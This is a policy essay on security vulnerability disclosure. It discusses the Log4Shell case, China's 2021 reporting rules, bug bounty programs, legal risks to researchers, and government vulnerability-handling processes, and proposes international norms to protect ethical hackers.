At the end of last year, Alibaba security researcher Chen Zhoujun discovered a critical software vulnerability in Log4j, an open-source logging library, and reported it to the Apache Software Foundation. Dubbed Log4Shell, it allows an attacker to take charge of Java-based web servers and launch remote-code execution attacks (allowing an attacker to run arbitrary code on the system from afar). This, coupled with the library’s popularity, made Log4Shell one of the most serious vulnerabilities on the internet in recent years. Although patches have been released, they have not yet been applied across the board, as seen in the recent run-up to the Russian invasion of Ukraine, where this vulnerability was used to insert malware into government systems.

While Zhoujun’s disclosure process of notifying the vendor first followed well-known industry norms, his actions may have run counter to the intentions of China’s “Regulations on the Management of Network Product Security Vulnerability” that came into force in September 2021. According to this regulation, companies are required to notify the Ministry of Industry and Information Technology (MIIT) of vulnerabilities found in their own systems within 48 hours, but the requirements as to vulnerabilities found elsewhere or by private researchers are less clear. In the Log4Shell case, the Chinese MIIT appears to have been notified two weeks later – by whom also remains unclear. Apparently, the MIIT was not pleased and sought to suspend work with Alibaba Cloud as a cyber-threat intelligence partner for half a year as a result.

Some observers in the security community interpreted MIIT’s handling of this case as a warning to other companies and researchers that they should keep the government in the loop from the onset. Others go further, fearing that vulnerabilities might be politicized, or worse, that they will be funneled to state actors for exploitation. Either way, the Log4Shell case is a reminder of the legal uncertainties that security researchers face on a daily basis in many countries, not only China.

We argue that States need to clarify their understanding of responsible disclosure, particularly vis-á-vis the position of China. More generally, we point out that the existing patchwork of regulations in many countries is no longer sustainable, given that it has failed to protect security researchers sufficiently. To develop a better framework, a necessary first step is a deeper understanding of the roles, motivations, practices, and needs of the transnational community of security researchers.

Harnessing the Crowd

At a very fundamental level, communities of security researchers help to cover the global cyber-skills shortage. In 2025, 3.5 million positions in IT-security are predicted to remain vacant and the number is set to grow in the following years. Coupled with the increasing number of cyberattacks, this shortage directly impacts governments and businesses, limiting their ability to protect themselves. One of the most popular short- to medium-term solutions to combat this deficit is participating in Bug Bounty Programs (BBPs).

BBPs offer security researchers, also sometimes dubbed ‘white hat hackers’, a reward or bounty for finding and reporting vulnerabilities in software products. The first program was born in 1995, when Netscape offered money for reporting security bugs in its browser. It took Mozilla nine years to follow the example, and a further three years for the public hacking competition “Pwn2Own” to emerge. Since then, BBPs have gained in importance, launched by businesses, organizations, and governments, managed mostly via specialized platforms, such as HackerOne or BugCrowd, among others. In many cases, participation is open to all, while others have certain restrictions, such as invitation-only events in which only those with a proven track record or security clearance can participate. Many HackerOne participants work and take part in their spare time and over half are under 25 years of age, using these programs as a training ground for future employment. Aside from leveraging resources that would otherwise not be available, this approach has also proven rather cost-effective for organizations, as the yearly operating costs for a BBP are far below those of hiring additional software engineers, who may never reach the crowd’s efficiency.

Political Pressures and Regulatory Patchworks

Although ethical hackers help to improve cyber defenses through the above-mentioned practices, their activities are often hampered by institutional deficits, legal uncertainties, or even political threats. Around half of the HackerOne participants has at least once found a security bug without disclosing it, either due to the absence of reporting channels, unresponsiveness of the organization, or the lack of a reward. This is especially unfortunate given that some specific guidelines on how to set up an appropriate vulnerability disclosure management do exist but are rarely implemented. Furthermore, competing regulatory frameworks and legal grey zones can lead to security researchers facing gagging orders, fines, or even imprisonment.

The importance of protecting security researchers was also emphasized at the U.N.-level recently, as was the stabilizing role of proper vulnerability disclosure policies. The U.N. Group of Governmental Experts (GGE) and the Open-Ended Working Group (OEWG) underlined governments’ duty to encourage responsible reporting of vulnerabilities in 2021. However, the U.N. norm on responsible vulnerability disclosure does not specify how government entities should handle their own security vulnerabilities, nor does it offer guidelines on how to avoid criminalization of legitimate security research. On top of that, parts of existing cybercrime legislations can apply not only to criminal action but can also be deployed to target security researchers, among others. The latter concern was highlighted in a recent letter from Human Rights Watch and numerous other civil society groups addressed to the Chair of the new U.N. Ad Hoc Committee on Cybercrime.

In practice, security researchers are currently faced with a patchwork of often inconsistent or even conflicting norms, institutions, and regulations. In U.S. legislation for example, Section 1201 of the Digital Millennium Copyright Act (DMCA) prohibits circumventing technological measures to gain unauthorized access to computer software, even for benevolent cybersecurity research. Security companies and organizations have repeatedly raised the issue, advocating for a legislative reform that would allow research in good faith, which has contributed to the partial easing of restrictions last year. An even more pressing example can be found in Germany’s Criminal Code Paragraph 202c, the so-called “Hacker Paragraph.” Not only does it criminalize unauthorized acquisition and manipulation of third-party data, but it also includes the preparation thereof. While intended as a protective measure against cybercrime, it also pre-empts and criminalizes security research. Any work done on the development, procurement, and distribution of tools for penetration testing can run afoul of this regulation, even though these tools are vital not only for security researchers but also network administrators and auditors, among others. In a recent case, a German security researcher detected serious flaws within the electoral campaign app of one of the major political parties in the country. Instead of being praised or rewarded for her disclosure, law enforcement agencies opened an investigation into the researcher. The case was eventually closed in September 2021 – but not because of the absence of malicious intent on part of the researcher; instead, it was closed because the data was not protected from unauthorized access and was therefore publicly retrievable from a technical point of view.

Lastly, security researchers can find themselves drawn into larger geopolitical conflicts, negatively affecting global cybersecurity. In the initial weeks following the Russian invasion of Ukraine, some security researchers were blocked from receiving payments for services rendered, as HackerOne seemingly applied a blanket freeze on all users from Belarus, Russia, or Ukraine, citing economic sections and export controls without clarifying further. More recently, several national governments have re-iterated their warnings regarding the Russian-made antivirus software Kaspersky, with Germany’s Federal Office for Information Security (BSI) now following suit. While they did not raise any concrete allegations, their concern stems from the antivirus software requiring extensive system permissions combined with connections to the manufacturer’s servers, at least for updates. The BSI warned that this access could be abused for offensive hacking operations – whether by Kaspersky itself, or by outside hackers, including government agents, who exploit Kaspersky’s systems.  Some BBPs, such as HackerOne, kicked Kaspersky off their platform as a result; Kaspersky has maintained that the warnings are politically motivated.

Opaque Governmental Processes

Another inconsistency concerns the role of civil cybersecurity agencies. On the one hand, they are key actors for sharing vulnerability disclosure best practices and offering anonymized reporting opportunities. Yet their role as broker and trustworthy intermediary is undermined by a lack of transparency of internal governmental procedures. In many cases, there are insufficient barriers between defensive-oriented civilian cybersecurity agencies and those agencies whose mandates include counteractions or even genuine offensive cyber operation. One exception is Germany, where a recently revised IT security law prohibits the civil cybersecurity agency from passing vulnerability information to law enforcement, intelligence services, or the military. However, there is still a lack of clarity around the overall handling of vulnerabilities found by German government agencies.

Other governments, notably members of the Five Eyes intelligence-sharing network, have published frameworks for handling vulnerabilities, i.e. for deciding whether to disclose or retain a vulnerability for offensive purposes. The United States published the Vulnerabilities Equities Process (VEP) in 2017 and the U.K., Australia, and Canada followed in subsequent years. These governments have at least established criteria to guide their decisions on the (non-)disclosure of vulnerabilities. Nevertheless, critics have noted that the process itself represents a black box that impedes independent oversight and impact evaluations. Furthermore, purchasing knowledge of vulnerabilities from access brokers has become customary among governmental agencies worldwide. This practice can seriously limit the regulatory effects of VEPs as governmental buyers often need to sign non-disclosure agreements, essentially preventing vulnerabilities from being processed through their VEP or equivalents.

More recently and in the context of the war in Eastern Europe, another worrying practice has emerged: the instrumentalization of bug bounty programs for offensive rather than defensive purposes. In early March, Ukrainian government agencies openly called on hackers to report IT-vulnerabilities within Russian critical infrastructures, not to protect but to attack them. This crowdsourcing of offensive cyber capabilities, although understandable in the midst of such a brutal invasion, nevertheless runs counter to ethical hacking. Decision-makers as well as civil society representatives will need to reflect on the legitimacy of this approach, and the precedent it sets, within the context of the Ukrainian whole-of-nation defense strategy.

The Chinese Push

In sum, vulnerability disclosure regulations in Western countries are not only incoherent and underdeveloped, but arguably also undermined by inconsistent state practices. In contrast, China’s law on vulnerability disclosure (the above-mentioned Regulations on the Management of Network Product Security Vulnerability) is much more comprehensive and guided by principles of nationalization and state control. On the one hand, it encourages the establishment of responsible disclosure practices within the private sector as well as the creation of BBPs. One could even argue that the move to make notification of state authorities mandatory was necessary to ensure that vendors will prioritize the patching of particularly severe vulnerabilities, given that they did not always do so in the past. Yet on the other hand, security researchers are faced with far greater insecurity. An open question remains, for instance, whether future collaboration between white hats and international BBPs will remain legal, as they are now precluded from disclosing vulnerabilities to foreign entities that are not vendors. Future implementation and enforcement of the law – as well as new data from BBPs – will show whether this will indeed lead to a massive withdrawal of Chinese researchers. If so, the law would constitute a frontal assault on the open global tradition of security research. As such, it would follow a pattern initiated in 2018, when China prohibited the participation of Chinese researchers in major global hacking competitions.

The law on vulnerability management coupled with the recent Chinese conceptualization of zero-day vulnerabilities as strategic assets prior to the new regulation has also stoked fears that state security and intelligence entities may gain additional resources, or at least information, for offensive purposes. The Chinese government could have offered reassurances by clarifying that civil cybersecurity agencies would not pass vulnerability information to intelligence services or the military, similar to Germany’s approach. Neither this, nor any confirmation on the benefits of a global community of security researchers over their nationalization by prohibiting transnational collaboration has been given by Chinese officials.

As it now stands, the Chinese legislation may violate the spirit of the U.N. cyber norm on responsible disclosure but certainly not the letter. The fact that there has been no international diplomatic outcry despite the increase in China’s access to zero-day vulnerabilities is a stark reminder of the still rather abstract nature of the U.N.’s cyber norm on responsible disclosure. This, in turn, puts China in the position of a norm entrepreneur and agenda setter on the international stage, intended or not, which starts to define the terms of acceptable state behavior in this particular area. This might motivate other States to emulate the Chinese example, which in many aspects runs counter to global cybersecurity. If liberal democracies worldwide want to avoid this outcome, they need to come up with their own comprehensive models of vulnerability disclosure policies and promote them at the international level, for example within the U.N. OEWG or via capacity-building programs.

How to Respond to the Challenges

At the very least, any further erosion of the transnational community of security researchers through nationalized regulatory frameworks should be discouraged. To improve global cybersecurity, yet more measures have to be taken to better protect private security research and to utilize its potential.

First, and as indicated by both the U.N. GGE consensus report and the Human Rights Watch letter, there is a need to overcome legal uncertainties and to make sure that responsible disclosure by security researchers is not deterred by excessive criminalization or the threat of high financial penalties. At the U.N.-level, this includes a standard on malicious hacking that clearly differentiates it from security researchers’ activities within a new Cybercrime Convention. For state actors, it involves updating outdated laws, setting up responsible disclosure policies, and strengthening the rights of security researchers. One important step could be to mainstream best practices among the private sector, such as the Information Security Standard ISO/IEC 29147:2018. It provides guidelines to vendors on vulnerability disclosure as an extension to the well-known and widely established Information Security Management Standards ISO/IEC 2700X:2013. Companies and administrative bodies should both be incentivized to implement such policies to make vulnerability disclosure processes transparent. The latter could for instance be required for critical infrastructure providers or serve as a prerequisite in the context of public procurement policies.

Second, and given recent Chinese agenda-setting, it is imperative for liberal democracies to shape international norms and standards and thus go beyond the recommendations of the OEWG and U.N. GGE reports, defining an explicit framework on what responsible disclosure should look like. These norms should also cover VEPs and similar procedures, ensuring sufficient process transparency, regular evaluations, and oversight by an independent body. Moreover, a key purpose of any such standard-setting activity should be to ensure as much interoperability between governmental regulations as possible, ideally beyond the national or regional contexts. At the same time, liberal democracies need to agree on certain red lines that must be observed in state practice. In particular, there is a need to identify and prevent loopholes, such as the use of commercial third-party vulnerabilities, to circumvent government disclosure practices.

Third, foreign and security policy decision-makers need to engage more actively with security scholars and the wider technical community, in especially via timely consultations in the legislative process. Given the impact of new technologies, it could be helpful to set up an international scientific advisory council, similar to the International Society for Stem Cell Research (ISSCR), which enables global collaboration in medical treatment development. In this case, the council should be capable of assessing the implications of new standards and norms as well as the impact of new legislation. This greater engagement, also including the private sector, could substantially support the creation of international capacity building programs as a peer-learning platform and vehicle of norm diffusion. Lessons could for example be drawn from computer incident response teams, who share information and best practices via the Vulnerability Coordination Special Interest Group.

Fourth, international negotiations themselves would benefit from the inclusion of the security community and academia, even beyond the topic of vulnerability disclosure policies. The improvement of export control rules for computer network intrusion software in the Wassenaar Arrangement in 2018 serves as a good example. Whereas the first negotiation was characterized by an oversimplified understanding of computer security practices by the regulating members, a successful revision and correction took place thanks to the direct participation of subject matter experts.

Lastly and closely related, international negotiations and cooperation in the field of vulnerability disclosure can also take part on the technical level, serving as Track II diplomacy. Workshops and informal meetings among other exchange formats can be seen as trust-building measures. Security experts, regardless of their provenance, likely share similar views on the issue and can be more open and transparent about concerns, without having to consider the usual diplomatic tug-of-war. This may lead to very different but more practice-oriented solutions at the global level.

Image: A laptop displays a message after being infected by a ransomware as part of a worldwide cyberattack on June 27, 2017 in Geldrop.
The unprecedented global ransomware cyberattack has hit more than 200,000 victims in more than 150 countries (ROB ENGELAAR/AFP/Getty Images)